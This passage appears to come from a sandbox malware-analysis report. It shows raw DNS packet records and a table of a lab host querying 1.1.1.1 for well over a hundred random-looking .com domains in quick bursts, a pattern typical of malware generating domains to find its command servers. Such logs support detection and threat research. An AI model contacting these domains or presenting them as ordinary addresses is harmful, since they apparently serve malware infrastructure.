                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417074919 CET53594301.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417087078 CET53602041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417524099 CET53494171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417546988 CET53547891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.418284893 CET53547081.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.419034004 CET53630411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.420028925 CET53538711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.428397894 CET6415953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.434709072 CET6547653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.435902119 CET5314553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.435951948 CET53617041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.436619997 CET53536961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.438374043 CET53513981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.438750982 CET53571181.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.439928055 CET53641591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.441051960 CET53607441.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.442678928 CET5260353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.443820000 CET53654761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.444122076 CET53546311.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.445930004 CET53531451.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.445956945 CET6240053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.447927952 CET5029753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.454739094 CET5757153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.454739094 CET5963053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.456435919 CET5084853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.459563971 CET6174453192.168.2.81.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.451500893 CET192.168.2.81.1.1.10x484bStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.453526020 CET192.168.2.81.1.1.10x4f61Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.454638958 CET192.168.2.81.1.1.10x6bfbStandard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.457443953 CET192.168.2.81.1.1.10xfe58Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.458601952 CET192.168.2.81.1.1.10x2d9aStandard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.519344091 CET192.168.2.81.1.1.10xeb9cStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.520976067 CET192.168.2.81.1.1.10xa6c5Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.521415949 CET192.168.2.81.1.1.10x1064Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.525688887 CET192.168.2.81.1.1.10xc023Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.535356045 CET192.168.2.81.1.1.10x4c09Standard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.536586046 CET192.168.2.81.1.1.10x4e16Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.545945883 CET192.168.2.81.1.1.10x2580Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.550546885 CET192.168.2.81.1.1.10xec8bStandard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.551522017 CET192.168.2.81.1.1.10x2a79Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.556700945 CET192.168.2.81.1.1.10x93c0Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.568180084 CET192.168.2.81.1.1.10xd09eStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.570851088 CET192.168.2.81.1.1.10x3557Standard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.572446108 CET192.168.2.81.1.1.10xcdb8Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.582787037 CET192.168.2.81.1.1.10x87fStandard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.590773106 CET192.168.2.81.1.1.10xe4feStandard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.590930939 CET192.168.2.81.1.1.10x3802Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591063023 CET192.168.2.81.1.1.10xbfa8Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591120958 CET192.168.2.81.1.1.10x8ed3Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591308117 CET192.168.2.81.1.1.10xa610Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591455936 CET192.168.2.81.1.1.10xec20Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591589928 CET192.168.2.81.1.1.10x35caStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591643095 CET192.168.2.81.1.1.10x4986Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.595145941 CET192.168.2.81.1.1.10x9b2eStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.596065044 CET192.168.2.81.1.1.10xbbaaStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.596993923 CET192.168.2.81.1.1.10x5acStandard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.597956896 CET192.168.2.81.1.1.10x5676Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.598071098 CET192.168.2.81.1.1.10xadbStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.598217010 CET192.168.2.81.1.1.10xfc4eStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.598464012 CET192.168.2.81.1.1.10x63f2Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.598984003 CET192.168.2.81.1.1.10x641Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.600120068 CET192.168.2.81.1.1.10x8be0Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.601278067 CET192.168.2.81.1.1.10x551aStandard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.601484060 CET192.168.2.81.1.1.10x2dd0Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.602230072 CET192.168.2.81.1.1.10x4808Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.610717058 CET192.168.2.81.1.1.10x240cStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.638166904 CET192.168.2.81.1.1.10xe2faStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.640847921 CET192.168.2.81.1.1.10xc966Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641021013 CET192.168.2.81.1.1.10x400eStandard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641288996 CET192.168.2.81.1.1.10xfb52Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641522884 CET192.168.2.81.1.1.10x63dfStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641550064 CET192.168.2.81.1.1.10xcc45Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641673088 CET192.168.2.81.1.1.10x1bddStandard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641942024 CET192.168.2.81.1.1.10x5f29Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.642230988 CET192.168.2.81.1.1.10xb388Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.642323017 CET192.168.2.81.1.1.10x97b4Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.645664930 CET192.168.2.81.1.1.10x642Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.656476021 CET192.168.2.81.1.1.10xa484Standard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.657857895 CET192.168.2.81.1.1.10xdd55Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.706362009 CET192.168.2.81.1.1.10x1a20Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.706362009 CET192.168.2.81.1.1.10x5b72Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.708108902 CET192.168.2.81.1.1.10x5fc5Standard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.715821028 CET192.168.2.81.1.1.10x2346Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.723193884 CET192.168.2.81.1.1.10xf90Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.723289013 CET192.168.2.81.1.1.10x7150Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.079829931 CET192.168.2.81.1.1.10x364fStandard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.082798004 CET192.168.2.81.1.1.10xbb43Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.095782995 CET192.168.2.81.1.1.10x7694Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.096477032 CET192.168.2.81.1.1.10x2b71Standard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.096643925 CET192.168.2.81.1.1.10x89e9Standard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.099136114 CET192.168.2.81.1.1.10x6f76Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.099944115 CET192.168.2.81.1.1.10x7660Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.106781006 CET192.168.2.81.1.1.10xc25eStandard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.107105017 CET192.168.2.81.1.1.10xebedStandard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.112060070 CET192.168.2.81.1.1.10x441bStandard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.113161087 CET192.168.2.81.1.1.10xd504Standard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.114820957 CET192.168.2.81.1.1.10x6522Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115004063 CET192.168.2.81.1.1.10xd6b7Standard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115205050 CET192.168.2.81.1.1.10x6d09Standard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115684032 CET192.168.2.81.1.1.10x3c7eStandard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115828991 CET192.168.2.81.1.1.10x5cadStandard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.116328955 CET192.168.2.81.1.1.10x3c46Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.116970062 CET192.168.2.81.1.1.10x2acaStandard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.122123957 CET192.168.2.81.1.1.10x3fe1Standard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.122594118 CET192.168.2.81.1.1.10x38eeStandard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.147203922 CET192.168.2.81.1.1.10x2d48Standard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.147387981 CET192.168.2.81.1.1.10x8b86Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.147559881 CET192.168.2.81.1.1.10xb02Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.147707939 CET192.168.2.81.1.1.10x5d6dStandard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.148459911 CET192.168.2.81.1.1.10x2cefStandard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.149029970 CET192.168.2.81.1.1.10x54e1Standard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.953924894 CET192.168.2.81.1.1.10xc06bStandard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.954046965 CET192.168.2.81.1.1.10x6136Standard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.954631090 CET192.168.2.81.1.1.10x5389Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.954873085 CET192.168.2.81.1.1.10xf7b3Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.955485106 CET192.168.2.81.1.1.10xacadStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.956785917 CET192.168.2.81.1.1.10x3f90Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.957055092 CET192.168.2.81.1.1.10xd5b6Standard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.957653999 CET192.168.2.81.1.1.10xe1e8Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.957914114 CET192.168.2.81.1.1.10x3690Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.960710049 CET192.168.2.81.1.1.10xf2d3Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.960927010 CET192.168.2.81.1.1.10x7aaStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.963126898 CET192.168.2.81.1.1.10x9490Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.965090990 CET192.168.2.81.1.1.10x50bfStandard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.965965986 CET192.168.2.81.1.1.10x4a1aStandard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.968147993 CET192.168.2.81.1.1.10x3d88Standard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.980508089 CET192.168.2.81.1.1.10x88e9Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.006349087 CET192.168.2.81.1.1.10x99b4Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.006551981 CET192.168.2.81.1.1.10x69bdStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.019170046 CET192.168.2.81.1.1.10xce39Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.026352882 CET192.168.2.81.1.1.10x5b48Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.027265072 CET192.168.2.81.1.1.10xec6aStandard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.028527975 CET192.168.2.81.1.1.10xdf87Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.029067993 CET192.168.2.81.1.1.10x5a48Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.030282974 CET192.168.2.81.1.1.10x3e76Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.031085014 CET192.168.2.81.1.1.10xa93Standard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.033715963 CET192.168.2.81.1.1.10x6827Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.037092924 CET192.168.2.81.1.1.10xf43Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.037820101 CET192.168.2.81.1.1.10x85baStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.127598047 CET192.168.2.81.1.1.10x12c5Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.128834009 CET192.168.2.81.1.1.10xdec0Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.129333973 CET192.168.2.81.1.1.10xe87dStandard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.130050898 CET192.168.2.81.1.1.10x386bStandard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.138386965 CET192.168.2.81.1.1.10x749eStandard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.138570070 CET192.168.2.81.1.1.10xab5eStandard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.138730049 CET192.168.2.81.1.1.10x7b1Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.139041901 CET192.168.2.81.1.1.10x2e40Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.144490004 CET192.168.2.81.1.1.10x85a7Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.150861025 CET192.168.2.81.1.1.10x36f2Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.157080889 CET192.168.2.81.1.1.10xd257Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.158325911 CET192.168.2.81.1.1.10x1526Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.158492088 CET192.168.2.81.1.1.10xf0c0Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.158632994 CET192.168.2.81.1.1.10x5904Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.169543028 CET192.168.2.81.1.1.10xa713Standard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.170636892 CET192.168.2.81.1.1.10x3cbfStandard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.171829939 CET192.168.2.81.1.1.10x85c7Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.203437090 CET192.168.2.81.1.1.10xc22dStandard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.368913889 CET192.168.2.81.1.1.10x4cc8Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.594228983 CET192.168.2.81.1.1.10xcea6Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.595463037 CET192.168.2.81.1.1.10xcb9fStandard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.599419117 CET192.168.2.81.1.1.10xc8f6Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.599446058 CET192.168.2.81.1.1.10xadeStandard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.599642038 CET192.168.2.81.1.1.10xe05aStandard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.599888086 CET192.168.2.81.1.1.10x66edStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.606307030 CET192.168.2.81.1.1.10x6c4Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.806651115 CET192.168.2.81.1.1.10x8560Standard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.837889910 CET192.168.2.81.1.1.10x56edStandard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.839499950 CET192.168.2.81.1.1.10xff9fStandard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.840270996 CET192.168.2.81.1.1.10x6101Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.840897083 CET192.168.2.81.1.1.10x8bcfStandard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.842861891 CET192.168.2.81.1.1.10x4404Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.843661070 CET192.168.2.81.1.1.10x3b5cStandard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.990627050 CET192.168.2.81.1.1.10xefadStandard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.991050005 CET192.168.2.81.1.1.10xc38Standard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.991381884 CET192.168.2.81.1.1.10xe2c8Standard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.991724014 CET192.168.2.81.1.1.10x83b4Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.992065907 CET192.168.2.81.1.1.10x9435Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.992726088 CET192.168.2.81.1.1.10xafe3Standard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.993120909 CET192.168.2.81.1.1.10x5259Standard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.993721008 CET192.168.2.81.1.1.10x4bdfStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.994528055 CET192.168.2.81.1.1.10x4e20Standard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.995191097 CET192.168.2.81.1.1.10xbec4Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.996001005 CET192.168.2.81.1.1.10x2784Standard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.996814013 CET192.168.2.81.1.1.10x959aStandard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.997270107 CET192.168.2.81.1.1.10x7f9eStandard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.998071909 CET192.168.2.81.1.1.10x6b15Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.998842955 CET192.168.2.81.1.1.10xdb0dStandard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.999516010 CET192.168.2.81.1.1.10x2ebfStandard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.999965906 CET192.168.2.81.1.1.10x39c1Standard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.000783920 CET192.168.2.81.1.1.10xb349Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.001247883 CET192.168.2.81.1.1.10xa76eStandard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.001832962 CET192.168.2.81.1.1.10x2bc0Standard query (0)qegykiq.comA (IP address)IN (0x0001)false
